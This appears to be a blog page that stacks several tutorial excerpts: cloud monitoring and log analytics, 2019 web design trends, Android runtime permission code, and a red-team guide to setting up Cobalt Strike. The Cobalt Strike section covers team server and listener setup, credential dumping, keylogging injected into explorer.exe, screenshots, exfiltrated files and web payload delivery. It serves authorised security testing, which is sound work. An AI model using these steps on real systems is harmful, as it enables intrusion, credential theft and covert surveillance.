Not only infrastructures but also applications' performance levels have to be closely monitored, in order to fine-tune application code as well as the infrastructure's architectural considerations. Typically, organizations find it easier to monitor the performance of applications hosted on a single server than the performance of composite applications that leverage several servers' resources. This becomes more tedious when the underlying compute resources are spread across multiple locations and are distributed; the major worry here is that the team loses visibility into, and control over, third-party data center resources. Enterprises, for different valid reasons, prefer a multi-cloud strategy for hosting their applications and data. There are several IT infrastructure management tools, practices, and principles, but these traditional toolsets are becoming obsolete in the cloud era.
There are a number of distinct characteristics associated with software-defined cloud environments. Any cloud application is expected to innately fulfill non-functional requirements (NFRs) such as scalability, availability, performance, flexibility, and reliability. Research reports say that organizations across the globe enjoy significant cost savings and increased management flexibility by modernizing and moving their applications into cloud environments.

The monitoring tool capabilities

It is paramount to deploy monitoring and management tools to effectively and efficiently run cloud environments in which thousands of computing, storage, and network solutions are running. Here are some of the key features and capabilities needed to properly monitor modern cloud-based applications and infrastructures:

- Firstly, the ability to capture and query events and traces, in addition to data aggregation, is essential. When a customer buys something online, the buying process generates a lot of HTTP requests. For proper end-to-end cloud monitoring, we need to see the exact set of HTTP requests the customer makes while completing the purchase. Any monitoring system has to be able to quickly identify bottlenecks and understand the relationships among different components, and the solution has to give the exact response time of each component for each transaction. Critical metadata, such as error traces and custom attributes, ought to be made available to enrich trace and event data. By segmenting the data via user- and business-specific attributes, it is possible to prioritize improvements and sprint plans to optimize for those customers.
- Secondly, the monitoring system has to be able to monitor a wide variety of cloud environments (private, public, and hybrid).
- Thirdly, the monitoring solution has to scale for any emergency.
The benefits

Organizations that use the right mix of technology solutions for IT infrastructure and business application monitoring in the cloud gain the following benefits:

- Performance engineering and enhancement
- On-demand computing
- Affordability
- Prognostic, predictive, and prescriptive analytics

Any operational environment needs data analytics and machine learning capabilities to be intelligent in its everyday actions and reactions. As data centers and server farms evolve and embrace new technologies (virtualization and containerization), it becomes more difficult to determine what impact these changes have on server, storage, and network performance. By using proper analytics, system administrators and IT managers can easily identify, and even predict, potential choke points and errors before they create problems. To know more about prognostic, predictive, and prescriptive analytics, head over to our book Practical Site Reliability Engineering.

Log analytics

Every software and hardware system generates a lot of log data (big data), and it is essential to do real-time log analytics to quickly understand whether there is any deviation or deficiency. This extracted knowledge helps administrators to consider countermeasures in time. Log analytics, if done systematically, facilitates preventive, predictive, and prescriptive maintenance. Workloads, IT platforms, middleware, databases, and hardware solutions all create a lot of log data when they work together to complete business functionality. There are several log analytics tools on the market.

Open source log analytics platforms

If there is a need to handle all log data in one place, then ELK is touted as the best-in-class open source log analytics solution. There are application as well as system logs; log entries are typically errors, warnings, and exceptions. ELK is a combination of three different products, namely Elasticsearch, Logstash, and Kibana (ELK).
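Before looking at the platforms themselves, the core idea of log analytics — turning raw log lines into actionable signals — can be illustrated in a few lines of code. This toy sketch (the log format and the 10% alert threshold are assumptions for illustration) counts entries per severity and flags an elevated error rate:

```python
import re
from collections import Counter

# Assumed log format: "<date> <time> <LEVEL> <message>"
LOG_PATTERN = re.compile(r"^\S+ \S+ (?P<level>DEBUG|INFO|WARN|ERROR)\b")

def analyze(lines, error_threshold=0.10):
    """Count log levels and flag whether the error ratio exceeds a threshold."""
    counts = Counter()
    for line in lines:
        match = LOG_PATTERN.match(line)
        if match:
            counts[match.group("level")] += 1
    total = sum(counts.values())
    error_ratio = counts["ERROR"] / total if total else 0.0
    return counts, error_ratio > error_threshold

logs = [
    "2019-01-13 10:00:01 INFO service started",
    "2019-01-13 10:00:02 ERROR connection refused",
    "2019-01-13 10:00:03 INFO request served",
    "2019-01-13 10:00:04 WARN slow response",
]
counts, alert = analyze(logs)
print(counts["ERROR"], alert)  # 1 error out of 4 lines -> ratio 0.25 -> alert
```

Platforms such as ELK do this at scale, in real time, and over structured fields rather than regex matches, but the preventive/predictive value comes from exactly this kind of aggregation.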
The macro-level ELK architecture is as follows. Elasticsearch is a search engine based on the Lucene library, used to store and retrieve data. Elasticsearch is, in a way, a NoSQL database: it stores multi-structured data and does not support SQL as the query language. Elasticsearch has a REST API, which uses verbs such as PUT and POST to work with data. If you want real-time processing of big data, then Elasticsearch is the way forward, and it is increasingly being primed for real-time, affordable log analytics.

Logstash is an open source, server-side data processing pipeline that ingests data from a variety of data sources simultaneously, transforms it, and sends it to a preferred destination. Logstash also handles unstructured data with ease. It has more than 200 plugins built in, and it is easy to write your own.

Kibana is the last module of the famous ELK toolset: an open source data visualization and exploration tool mainly used for log and time-series analytics, application monitoring, and IT operational analytics (ITOA). Kibana is gaining a lot of market and mind share, as it makes it easy to build histograms, line graphs, pie charts, and heat maps.

Logz.io, a commercialized version of the ELK platform, describes itself as the world's most popular open source log analysis platform. It is made available as an enterprise-grade service in the cloud, promising high availability, strong security, and scalability.

Cloud-based log analytics platforms

The log analytics capability is offered as a cloud-based, value-added service by various cloud service providers (CSPs). The Microsoft Azure cloud provides a Log Analytics service to its users/subscribers by constantly monitoring both cloud and on-premises environments, to support decisions that ultimately ensure their availability and performance.
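As a concrete illustration of Logstash's role in that pipeline, a minimal configuration might look like the following (the file path, grok pattern, and index name are assumptions for illustration):

```
input {
  file {
    path => "/var/log/myapp/*.log"
    start_position => "beginning"
  }
}

filter {
  grok {
    match => { "message" => "%{TIMESTAMP_ISO8601:ts} %{LOGLEVEL:level} %{GREEDYDATA:msg}" }
  }
}

output {
  elasticsearch {
    hosts => ["localhost:9200"]
    index => "myapp-logs"
  }
}
```

This sketches the ingest-transform-ship flow: the file input tails application logs, the grok filter structures each line, and the Elasticsearch output makes the result searchable in Kibana.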
The Azure cloud has its own monitoring mechanism in place through Azure Monitor, which collects and meticulously analyzes log data emitted by various Azure resources. The Log Analytics feature of the Azure cloud takes this monitoring data and correlates it with other relevant data to supply additional insights. The same capability is also made available for private cloud environments: it can collect all types of log data through various tools from multiple sources and consolidate them into a single, centralized repository. Then, the suite of analysis tools in Log Analytics, such as log searches and views, work together to provide centralized insights across your entire environment. This kind of service is offered by other cloud service providers too; AWS is one well-known provider among many others.

The paramount contributions of log analytics tools include the following:

- Infrastructure monitoring: Log analytics platforms easily and quickly analyze logs from bare-metal (BM) servers and network solutions, such as firewalls, load balancers, application delivery controllers, CDN appliances, storage systems, virtual machines, and containers.
- Application performance monitoring: The analytics platform captures application logs, which are streamed live, and takes the assigned performance metrics for real-time analysis and debugging.
- Security and compliance: The service provides immutable log storage, centralization, and reporting to meet compliance requirements. It offers deeper monitoring and decisive collaboration for extracting useful and usable insights.

AI-enabled log analytics platforms

Algorithmic IT Operations (AIOps) leverages proven AI algorithms to help organizations smooth the path to their digital-transformation goals. AIOps is being touted as the way forward to substantially reduce IT operational costs.
AIOps automates the process of analyzing IT infrastructures and business workloads to give administrators the right and relevant details about their functioning and performance levels. AIOps minutely monitors each of the participating resources and applications, and then intelligently formulates the various steps to be taken for their continued well-being. AIOps helps to realize the goals of preventive and predictive maintenance of IT and business systems, and also produces prescriptive details for resolving issues with clarity and confidence. Furthermore, AIOps lets IT teams conduct root-cause analysis by identifying and correlating issues.

Loom

Loom is a leading provider of AIOps solutions. Loom's AIOps platform consistently leverages competent machine-learning algorithms to easily and quickly automate the log-analysis process. The real-time analytics capability of the ML algorithms enables organizations to arrive at correct resolutions for issues, and to complete the resolution tasks in an accelerated fashion. Loom delivers an AI-powered log-analysis platform to predict all kinds of impending issues and prescribe the resolution steps. Anomalies are rapidly detected, and strategically sound solutions are formulated with the assistance of this AI-centric log analytics platform.
IT operational analytics

Operational analytics helps with the following:

- Extracting operational insights
- Reducing IT costs and complexity
- Improving employee productivity
- Identifying and fixing service problems for an enhanced user experience
- Gaining end-to-end insights critical to the business's operations, offerings, and outputs

To facilitate operational analytics, there are integrated platforms, whose contributions include the following:

- Troubleshoot applications, investigate security incidents, and facilitate compliance requirements in minutes instead of hours or days
- Analyze various performance indicators to enhance system performance
- Use report-generation capabilities to present trends in preferred formats (maps, charts, and graphs), and much more

Thus, the operational analytics capability comes in handy for capturing operational data (real-time and batch) and crunching it to produce actionable insights that enable autonomic systems. Also, operations team members, IT experts, and business decision-makers can get useful information for working out correct countermeasures if necessary. The operational insights gained also convey what needs to be done to enable the systems under investigation to attain their optimal performance.

IT performance and scalability analytics

There are typically big gaps between the theoretical and practical performance limits. The challenge is how to enable systems to attain their theoretical performance level under any circumstances. The required performance level can suffer for various reasons: poor system design, bugs in software, network bandwidth, third-party dependencies, and I/O access. Middleware solutions can also contribute to unexpected performance degradation. The system's performance has to be maintained under any load (user, message, and data). Performance testing is one way of recognizing performance bottlenecks and adequately addressing them.
The testing is performed in the pre-production phase. Besides system performance, application scalability and infrastructure elasticity are other prominent requirements. There are two scalability options:

- Scale up, to fully utilize SMP hardware
- Scale out, to fully utilize distributed processors

It is also possible to have both at the same time; that is, to scale up and out by combining the two scalability choices.

IT security analytics

IT infrastructure security, application security, and data security (at rest, in transit, and in use) are the top three security challenges, and there are security solutions approaching these issues at different levels and layers. Access-control mechanisms, cryptography, hashing, digests, digital signatures, watermarking, and steganography are the well-known and widely used techniques for ensuring impenetrable and unbreakable security. There is also security testing, and ethical hacking, for identifying security risk factors and eliminating them at the budding stage. All kinds of security holes, vulnerabilities, and threats are meticulously unearthed in order to deploy defect-free, safety-critical, and secure software applications. During the post-production phase, security-related data is extracted from both software and hardware products to precisely and painstakingly produce security insights, which in turn go a long way in empowering security experts and architects to bring forth viable solutions that ensure the utmost security and safety for IT infrastructures and software applications.

The importance of root-cause analysis

The cost of service downtime keeps growing. There are reports stating that the cost of downtime ranges from $72,000 to $100,000 per minute. Identifying the root cause (the mean time to identification, or MTTI) generally takes hours. For a complex situation, the process may run into days.
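A back-of-the-envelope calculation shows why MTTI dominates incident cost. The sketch below is our illustration (the per-minute cost figure echoes the range cited above; the scenario itself is hypothetical):

```java
// Total incident cost grows linearly with the minutes spent identifying
// the root cause, so shrinking MTTI pays off directly.
public class DowntimeCost {
    public static long incidentCost(long mttiMinutes, long repairMinutes,
                                    long costPerMinute) {
        return (mttiMinutes + repairMinutes) * costPerMinute;
    }

    public static void main(String[] args) {
        // 3 hours to identify + 30 minutes to fix, at $72,000/minute.
        System.out.println(incidentCost(180, 30, 72_000));
    }
}
```

Halving the three-hour identification window in this scenario saves far more than any plausible speed-up of the fix itself, which is the economic argument for automated root-cause analysis.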
OverOps analyzes code in staging and production to automatically detect and deliver the root causes of all errors, with no dependency on logging. OverOps shows you a stack trace for every error and exception. However, it also shows you the complete source code, objects, variables, and values that caused that error or exception to be thrown. This helps in identifying the root cause when your code breaks. OverOps injects a hyperlink into the exception, and you'll be able to jump directly into the source code and the actual variable state that caused it. OverOps can co-exist in production alongside all the major APM agents and profilers. Using OverOps with your APM allows you to monitor server slowdowns and errors, along with the ability to drill down into the real root cause of each issue.

Summary

There are several activities being strategically planned and executed to enhance the resiliency, robustness, and versatility of enterprise, edge, and embedded IT. This tutorial described the various kinds of post-production data analytics that allow you to gain a deeper understanding of applications, middleware solutions, databases, and IT infrastructures in order to manage them effectively and efficiently. To gain experience working with SRE concepts and learn to deliver highly reliable apps and services, check out the book Practical Site Reliability Engineering.

Site reliability engineering: Nat Welch on what it is and why we need it [Interview]
Key trends in software infrastructure in 2019: observability, chaos, and cloud complexity
5 ways artificial intelligence is upgrading software engineering

Guest Contributor
12 Jan 2019
6 min read

7 Web design trends and predictions for 2019

Staying updated on web design trends is crucial. Today's norm may change tomorrow with shifting algorithms, captivating visuals, and the introduction of new best practices. Staying on top by frequently refreshing your website is thus essential to avoid looking like a relic of the past. 2019 will be all about engaging website designs focusing on flat design, captivating structures and layouts, speed, mobile performance, and so on. Here are 7 web design predictions that we think will be trending in 2019.

#1 Website speed

You will have come across this pivotal aspect of web design. It is strongly recommended that a website's loading time be less than three seconds to make a lasting impact on visitors. Keeping your visitors waiting longer than this results in a high bounce rate. Based on a survey by the Aberdeen Group, 5% of organizations found that website visitors abandoned their website after just a second of delay. An enthralling website design overloaded with data that slows your page speed could eat into your revenue in a huge way. Google's Speed Update, which came into effect in July 2018, emphasizes the need to focus on page loading time. Moreover, Google prioritizes and ranks faster-loading websites higher. Though the need for videos and images in web design still exists, the challenge in 2019 will be to reduce page loading time without compromising the look of the website.

#2 Mobile first phenomenon

With user preferences leaning heavily towards mobile devices, "mobile first" web design has become the need of the hour. This is not only to rank higher on SERPs but also to boost the quality of the customer experience on the device. Websites need to be designed for mobile devices in the first place. Mobile first web design means conceptualizing the website for mobile from the outset, taking into consideration parameters like a responsive and user-friendly design.
Again, 2019 will call for more optimization geared towards voice search. Users are impatient to get hold of information in the fastest way possible. Voice search optimization on mobile will include:

- Focusing on long-tail keywords and conversational, natural spoken language
- Appropriate usage of schema metadata
- An emphasis on semantics
- Optimization based on local listings

This is yet another unmissable trend of 2019.

#3 Flat designs

Clutter-free, focused websites have always been in demand. Flat design is all about minimalism and improved usability. This kind of design helps focus attention on the important parts of the website using bright colors, clean-edged designs, and a lot of free space. There are two reasons for website owners to opt for flat designs in 2019. First, they contain fewer components, are data-light, and load fast, improving the website's speed and optimization quotient. Second, they enhance the customer experience with a quick-loading website on both the mobile and desktop versions. By adopting flat designs, websites can stay on users' favorite lists longer, in turn churning out elevated conversion rates.

#4 Micro-animations

Micro-animations may seem like minute features on a webpage, but they add great value. A color change when you click the submit button conveys that the action has been performed. A list that enlarges when you point the mouse at a particular product makes its presence felt. Such animations communicate to the user that actions have been accomplished. Again, visuals are always captivating, be it a background video or a micro-animation. Micro-animations create a visual hierarchy and compel users towards conversion points. So micro-animations are definitely here to stay in 2019.

#5 Chatbots

Chatbots have become much more common as they help bridge communication gaps. These chatbots have grown smarter with improved artificial intelligence and machine learning techniques.
They can improve response time, personalize communication, and automate repetitive tasks. Chatbots understand our data based on previous chat history, predict what we might be looking for, and give us automatic recommendations about products. Chatbots can sense our interests and provide us with personalized ad content, thereby enhancing customer satisfaction. Chatbots serve as crucial touch points. They can intelligently handle customer service while collecting sensitive customer data for the sales team. This way, you can analyze your customer base even before initiating a first discussion with them. 2019 will see many more such interactions being incorporated into websites.

#6 Single page designs

A simple, clutter-free, single-page design is going to be a buzzword of 2019. A single page design literally means one page, without extra links leading to blogs or detailed service pages. The next question would be about SEO optimization based on keywords and content. To begin with, single-page websites have a neatly siloed hierarchy. As they do not have aspects that slow down the site, they are easily compatible across devices. The page-less design has minimal HTML and JavaScript, which improves the customer experience and in turn helps earn a higher keyword ranking on SEO. Also, with far fewer elements on the page, they can be managed easily. Frequent updates and changes based on customer expectations and trends can be made at regular intervals, adding greater value to the website. This is yet another aspect to watch in 2019.

#7 Shapes incorporated

Incorporating simple geometric shapes on your website can do wonders for its appearance. They load easily and are also engaging. Shapes are similar to colors in the impact they have on the mood of visitors. Rectangles showcase stability, circles represent unity, and triangles are supposed to reflect dynamism.
Using shapes based on your aesthetic sense, either sparingly or liberally, can definitely catch the attention of your visitors. You can place them in areas where you want to attract attention and create a visual hierarchy. Implementing geometric shapes on your website will drive traffic and affect your potential sales in a huge way. Staying on top of the competition is all about presenting fresh ideas without compromising on the quality of services and user experience. Emerge as a pacesetter on par with upcoming trends and differentiate your services in the current milieu to reap maximum benefits.

Author Bio

Swetha S. is adept at creating customer-centered marketing strategies focused on augmenting brand presence. She is currently the Digital Marketing Manager for eGrove Systems and Elite Site Optimizer, contributing to the success of the organization.
Savia Lobo
12 Jan 2019
15 min read

Red Team Tactics: Getting started with Cobalt Strike [Tutorial]

According to cobaltstrike.com:

"Cobalt Strike is a software for Adversary Simulations and Red Team Operations. Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network. While penetration tests focus on unpatched vulnerabilities and misconfigurations, these assessments benefit security operations and incident response."

This tutorial is an excerpt taken from the book Hands-On Red Team Tactics, written by Himanshu Sharma and Harpreet Singh. The book demonstrates advanced methods of post-exploitation using Cobalt Strike and introduces you to Command and Control (C2) servers and redirectors. In this article, you will learn the basics of what Cobalt Strike is, how to set it up, and its interface.

Before installing Cobalt Strike, please make sure that you have Oracle Java installed, version 1.7 or above. You can check whether or not you have Java installed by executing the following command:

    java -version

If you receive the java command not found error or another related error, then you need to install Java on your system. You can download it here: https://www.java.com/en/. Cobalt Strike comes as a package consisting of client and server files. To start with the setup, we need to run the team server. The following are the files that you'll get once you download the package. The first thing we need to do is run the team server script located in the same directory.

What is a team server?

This is the main controller for the payloads that are used in Cobalt Strike. It logs all of the events that occur in Cobalt Strike. It collects all the credentials that are discovered in the post-exploitation phase or used by the attacker on the target systems to log in. It is a simple bash script that calls the Metasploit RPC service (msfrpcd) and starts the server with cobaltstrike.jar. This script can be customized according to your needs.
Cobalt Strike works on a client-server model in which the red teamer connects to the team server via the Cobalt Strike client. All the connections (bind/reverse) to and from the victims are managed by the team server. The requirements for running the team server are as follows:

System requirements:
- 2 GHz+ processor
- 2 GB RAM
- 500 MB+ available disk space

Amazon EC2:
- At least a high-CPU medium (c1.medium, 1.7 GB) instance

Supported operating systems:
- Kali Linux 1.0, 2.0 – i386 and AMD64
- Ubuntu Linux 12.04, 14.04 – x86 and x86_64

The Cobalt Strike client supports:
- Windows 7 and above
- macOS X 10.10 and above
- Kali Linux 1.0, 2.0 – i386 and AMD64
- Ubuntu Linux 12.04, 14.04 – x86 and x86_64

As shown in the following screenshot, the team server needs at least two mandatory arguments in order to run. The first is host, an IP address that is reachable from the internet; if behind a home router, you can port-forward the listener's port on the router. The second mandatory argument is password, which will be used by the team server for authentication.

The third and fourth arguments specify a Malleable C2 communication profile and a kill date for the payloads (both optional). A Malleable C2 profile is a simple program that specifies how to transform data and store it in a transaction. It's a really cool feature in Cobalt Strike.

The team server must run with root privileges so that it can start listeners on system ports (port numbers 0-1023); otherwise, you will receive a Permission denied error when attempting to start a listener. The Permission denied error can be seen on the team server console window, as shown in the following screenshot.

Now that the concept of the team server has been explained, we can move on to the next topic. You'll learn how to set up a team server and access it through Cobalt Strike.
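For a feel of what a Malleable C2 profile looks like, here is a minimal illustrative fragment in Cobalt Strike's profile language, based on publicly documented profile syntax. The URI, header, and sleep values are arbitrary placeholders, not recommendations; consult the official Malleable C2 documentation (and run profiles through c2lint) before use.

```text
# Minimal Malleable C2 profile sketch (illustrative only)
set sleeptime "30000";

http-get {
    set uri "/updates";

    client {
        metadata {
            base64;
            header "Cookie";
        }
    }

    server {
        header "Content-Type" "text/html";
        output {
            base64;
            print;
        }
    }
}
```

Even this tiny profile changes how beacon traffic looks on the wire, which is the whole point: defenders fingerprint defaults, and Malleable C2 lets the operator avoid them.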
Cobalt Strike setup

The team server can be run using the following command:

    sudo ./teamserver 192.168.10.122 harry@123

Here, I am using the IP 192.168.10.122 for my team server and harry@123 as its password. If you receive the same output as in the preceding screenshot, your team server is running successfully. Of course, the SHA256 hash for the SSL certificate used by the team server will be different each time it runs on your system, so don't worry if the hash changes each time you start the server. Upon successfully starting the server, we can now get on with the client. To run the client, use the following command:

    java -jar cobaltstrike.jar

This command will open the connect dialog, which is used to connect to the Cobalt Strike team server. At this point, you need to provide the team server IP, the Port number (50050 by default), the User (any name of your choice), and the Password for the team server. The client will connect to the team server when you press the Connect button. Upon successful authorization, you will see a team server fingerprint verification window. This window shows the SHA256 hash of the SSL certificate that the team server generated at runtime; verify that it matches exactly. This verification only happens once, during the initial stage of the connection. If you see this window again, your team server has either been restarted or you are connected to a different instance. This is a precautionary measure for preventing man-in-the-middle (MITM) attacks. Once the connection is established with the team server, the Cobalt Strike client will open. Let's look further into the Cobalt Strike interface so that you can use it to its full potential in a red-team engagement.

Cobalt Strike interface

The user interface for Cobalt Strike is divided into two horizontal sections, as demonstrated in the preceding screenshot.
These sections are the visualization tab and the display tab. The top of the interface shows the visualization tab, which visually displays all the sessions and targets, making it easier to understand the network of compromised hosts. The bottom of the interface shows the display tab, which is used to display the Cobalt Strike features and the sessions for interaction.

Toolbar

Common features used in Cobalt Strike are readily accessible at the click of a button. The toolbar offers all the common functions to speed up your Cobalt Strike usage. Each feature in the toolbar is as follows:

Connecting to another team server

In order to connect to another team server, you can click on the + sign, which will open up the connect window. All previous connections are stored as profiles and can be recalled for connection in the connect window.

Disconnecting from the team server

By clicking on the minus (–) sign, you will be disconnected from the current instance of the team server. You will also see a box just above the server switchbar that says Disconnected from team server. Once you disconnect from the instance, you can close it and continue operations on another instance. However, bear in mind that once you close the tab after disconnection, you will lose all the display tabs that were open on that particular instance. What's wrong with that? In a red-team operation, you do not always have a script ready that executes certain commands and saves the information in the database. In such cases, it is better to execute the command in a shell and then save the output in Notepad or Sublime. However, not many people follow this practice, and hence they lose a lot of valuable information. You can now imagine how heart-breaking it can be to close the instance after a disconnection and find that all of your shell output (which was not even copied to Notepad) is gone!
Configure listeners

For a team server to function properly, you need to configure a listener. But before we can do this, we need to know what a listener actually is. Just like the handler used in Metasploit (that is, exploit/multi/handler), the Cobalt Strike team server also needs a handler for handling the bind/reverse connections to and from the target/victim's system or server. You can configure a listener by clicking on the headphones-like icon. After clicking the headphones icon, you'll open the Listeners tab in the bottom section. Click on the Add button to add a new listener. You can choose the type of payload you want to listen for, along with the Host IP address and the port that the team server or the redirector will listen on. In this case, we have used a beacon payload, which communicates over SSL. Beacon payloads are a special kind of payload in Cobalt Strike that may look like a generic Meterpreter but actually have much more functionality. Beacons will be discussed in more detail in further chapters. As a beacon uses HTTP/S as the communication channel to check for the tasking allotted to it, you'll be asked to give the IP address of the team server, and the domain name in case a redirector is configured (redirectors will also be discussed in more detail in further chapters). Once you're done with the previous step, you have successfully configured your listener, and it is now ready for an incoming connection.

Session graphs

To see the sessions in a graph view, you can click the button shown in the following screenshot. Session graphs show a graphical representation of the systems that have been compromised and injected with the payloads. In the following screenshot, the system displayed on the screen has been compromised.
PT is the user, PT-PC is the computer name (hostname), and the numbers just after the @ are the PIDs of the processes into which the payload has been injected. When you escalate privileges from a normal user to NT AUTHORITY\SYSTEM (vertical privilege escalation), the session graph shows the system in red, surrounded by lightning bolts. There is also another thing to notice here: the * (asterisk) just after the username. This means that the session with PID 1784 has been escalated to NT AUTHORITY\SYSTEM.

Session table

To see the open sessions in a tabular view, click on the button shown in the following screenshot. All the sessions that are opened in Cobalt Strike will be shown along with their details, such as the external IP, internal IP, user, computer name, the PID into which the session is injected, and Last. Last is an element of Cobalt Strike similar to WhatsApp's Last Seen feature, showing the last time the compromised system contacted the team server (in seconds). It is generally used to check when the session was last active. Right-clicking on one of the sessions gives the user multiple options to interact with, as demonstrated in the following screenshot. These options will be discussed later in the book.

Targets list

To view the targets, click on the button shown in the following screenshot. Targets will only show the IP address and the computer name. For further options, you can right-click on the target. From here, you can interact with the sessions opened on the target system. As you can see in the preceding screenshot, PT@2908 is the session opened on the given IP and the beacon payload resides in PID 2908. Consequently, we can interact with this session directly from here.

Credentials

Credentials such as web login passwords, password hashes extracted from the SAM file, and plain-text passwords extracted using mimikatz are retrieved from the compromised system and saved in the database.
They can be displayed by clicking on the icon shown in the following screenshot. When you perform a hashdump in Metasploit (a post-exploitation module that dumps all NTLM password hashes from the SAM database), the credentials are saved in the database. Likewise, when you dump hashes in Cobalt Strike or use valid credentials to log in, the credentials are saved and can be viewed from here.

Downloaded files

To view all the exfiltrated data from the target system, you can click on the button shown in the following screenshot. This will show the files (exfiltration) that were downloaded from the target system.

Keystrokes

This option is generally used when you have enabled a keylogger in the beacon. The keylogger logs the keystrokes and sends them to the beacon. To use this option, click the button shown in the following screenshot. When a user logs into the system, the keylogger will log all the keystrokes of that user (explorer.exe is a good candidate for keylogging). So, before you enable the keylogger from the beacon, migrate or inject a new beacon into the explorer.exe process and then start the keylogger. Once you do this, you'll see a new entry in the Keystrokes tab. The left side of the tab shows the information related to the beacon, including the user, the computer name, the PID into which the keylogger is injected, and the timestamp when the keylogger sent the saved keystrokes to the beacon. The right side of the tab shows the keystrokes that were logged.

Screenshots

To view the screenshots from the target system, click on the button shown in the following screenshot. This will open up the tab for screenshots. Here, you can see what's happening on the system's screen at that moment. This is quite helpful when a server administrator is logged in to the system and is working on Active Directory (AD) and Domain Controller (DC) settings.
When monitoring the screen, we can find crucial information that can lead to a DC compromise. To learn about payload generation with stageless Windows executables, Java signed applets, and MS Office macros, head over to the book for a complete overview.

Scripted web delivery

This technique is used to deliver the payload via the web. To continue, click on the button shown in the following screenshot. A scripted web delivery delivers the payload to the target system when the generated command/script is executed on the system. A new window will open where you can select the type of script/command that will be used for payload delivery. Here, you also have the option to add the listener accordingly.

File hosting

Files that you want to host on a web server can also be hosted through the Cobalt Strike team server. To host a file through the team server, click on the button shown in the following screenshot. This will bring up a window where you can set the URI, the file you want to host, the web server's IP address and port, and the MIME type. Once done, you can download that file from the Cobalt Strike team server's web server. You can also provide the IP and port information of your favorite web redirector. This method is generally used for payload delivery.

Managing the web server

The web server running on the team server, which is generally used for file hosting and beacons, can be managed as well. To manage the web server, click on the button shown in the following screenshot. This will open the Sites tab, where you can find all the web services, the beacons, and the jobs assigned to those running beacons. You can manage the jobs here.

Server switchbar

The Cobalt Strike client can connect to multiple team servers at the same time, and you can manage all the existing connections through the server switchbar. The switchbar allows you to switch between server instances. You can also rename the instances according to the role of each server.
To do this, simply right-click on the instance tab and you'll get two options: Rename and Disconnect. Click on the Rename button to rename the instance of your choice. Once you click this button, you'll be prompted for the new name that you want to give to your instance. For now, we have changed this to EspionageServer. Renaming the instances helps a lot when it comes to managing multiple sessions from multiple team servers at the same time. To learn more about how to customize a team server, head over to the book.

To summarize, we covered what a team server is, how to set up Cobalt Strike, and the Cobalt Strike interface. If you've enjoyed reading this, head over to the book, Hands-On Red Team Tactics, to learn about advanced penetration testing tools, techniques for getting reverse shells over encrypted channels, and processes for post-exploitation.

"All of my engineering teams have a machine learning feature on their roadmap" – Will Ballard talks artificial intelligence in 2019 [Interview]
IEEE Computer Society predicts top ten tech trends for 2019: assisted transportation, chatbots, and deep learning accelerators among others
Facebook releases DeepFocus, an AI-powered rendering system to make virtual reality more real

Natasha Mathur
11 Jan 2019
11 min read

Getting your Android app ready for the Play Store[Tutorial]

In this tutorial, we will discuss adding finishing touches to your Android app before you release it to the Play Store, such as using the Android 6.0 runtime permission model, scheduling an alarm, receiving notification of a device boot, using AsyncTask for background work, adding speech recognition, and adding Google sign-in to your app. This tutorial is an excerpt taken from the book 'Android 9 Development Cookbook - Third Edition', written by Rick Boyer. The book explores more than 100 proven industry-standard recipes and strategies to help you build feature-rich and reliable Android Pie apps.

The Android 6.0 Runtime Permission Model

The old security model was a sore point for many in Android. It's common to see reviews commenting on the permissions an app requires. Sometimes, permissions were unrealistic (such as a flashlight app requiring internet permission), but other times the developer had good reasons to request certain permissions. The main problem was that it was an all-or-nothing prospect. This finally changed with the Android 6 Marshmallow (API 23) release. The new permission model still declares permissions in the manifest as before, but users have the option of selectively accepting or denying each permission. Users can even revoke a previously granted permission. Although this is a welcome change for many, for a developer it has the potential to break code that worked before. Google now requires apps to target Android 6.0 (API 23) or above to be included on the Play Store; apps that haven't been updated will be removed by the end of the year (2018).

Getting ready

Create a new project in Android Studio and call it RuntimePermission. Use the default Phone & Tablet option and select Empty Activity when prompted for Activity Type. The sample source code sets the minimum API to 23, but this is not required.
If your compileSdkVersion is API 23 or above, the compiler will flag your code for the new security model.

How to do it...

We need to start by adding our required permission to the manifest, then we'll add a button to call our check-permission code. Open the Android Manifest and follow these steps:

Add the following permission:

    <uses-permission android:name="android.permission.SEND_SMS" />

Open activity_main.xml and replace the existing TextView with a button that calls doSomething() via android:onClick.

Open MainActivity.java and add the following constant to the class:

    private final int REQUEST_PERMISSION_SEND_SMS = 1;

Add this method for a permission check:

    private boolean checkPermission(String permission) {
        int permissionCheck = ContextCompat.checkSelfPermission(
                this, permission);
        return (permissionCheck == PackageManager.PERMISSION_GRANTED);
    }

Add this method to request permission:

    private void requestPermission(String permissionName,
            int permissionRequestCode) {
        ActivityCompat.requestPermissions(this,
                new String[]{permissionName}, permissionRequestCode);
    }

Add this method to show the explanation dialog:

    private void showExplanation(String title, String message,
            final String permission, final int permissionRequestCode) {
        AlertDialog.Builder builder = new AlertDialog.Builder(this);
        builder.setTitle(title)
               .setMessage(message)
               .setPositiveButton(android.R.string.ok,
                       new DialogInterface.OnClickListener() {
                           public void onClick(DialogInterface dialog, int id) {
                               requestPermission(permission,
                                       permissionRequestCode);
                           }
                       });
        builder.create().show();
    }

Add this method to handle the button click:

    public void doSomething(View view) {
        if (!checkPermission(Manifest.permission.SEND_SMS)) {
            if (ActivityCompat.shouldShowRequestPermissionRationale(this,
                    Manifest.permission.SEND_SMS)) {
                showExplanation("Permission Needed", "Rationale",
                        Manifest.permission.SEND_SMS,
                        REQUEST_PERMISSION_SEND_SMS);
            } else {
                requestPermission(Manifest.permission.SEND_SMS,
                        REQUEST_PERMISSION_SEND_SMS);
            }
        } else {
            Toast.makeText(MainActivity.this, "Permission (already) Granted!",
                    Toast.LENGTH_SHORT).show();
        }
    }

Override onRequestPermissionsResult() as follows:

    @Override
    public void onRequestPermissionsResult(int requestCode,
            String permissions[], int[] grantResults) {
        switch (requestCode) {
            case REQUEST_PERMISSION_SEND_SMS: {
                if (grantResults.length > 0
                        && grantResults[0] == PackageManager.PERMISSION_GRANTED) {
                    Toast.makeText(MainActivity.this, "Granted!",
                            Toast.LENGTH_SHORT).show();
                } else {
                    Toast.makeText(MainActivity.this, "Denied!",
                            Toast.LENGTH_SHORT).show();
                }
                return;
            }
        }
    }

Now, you're ready to run the application on a device or emulator.

How it works...

Using the new runtime permission model involves the following:

- Check to see whether you have the desired permission
- If not, check whether we should display the rationale (meaning that the request was previously denied)
- Request the permission; only the OS can display the permission request
- Handle the request response

Here are the corresponding methods:

- ContextCompat.checkSelfPermission
- ActivityCompat.requestPermissions
- ActivityCompat.shouldShowRequestPermissionRationale
- onRequestPermissionsResult

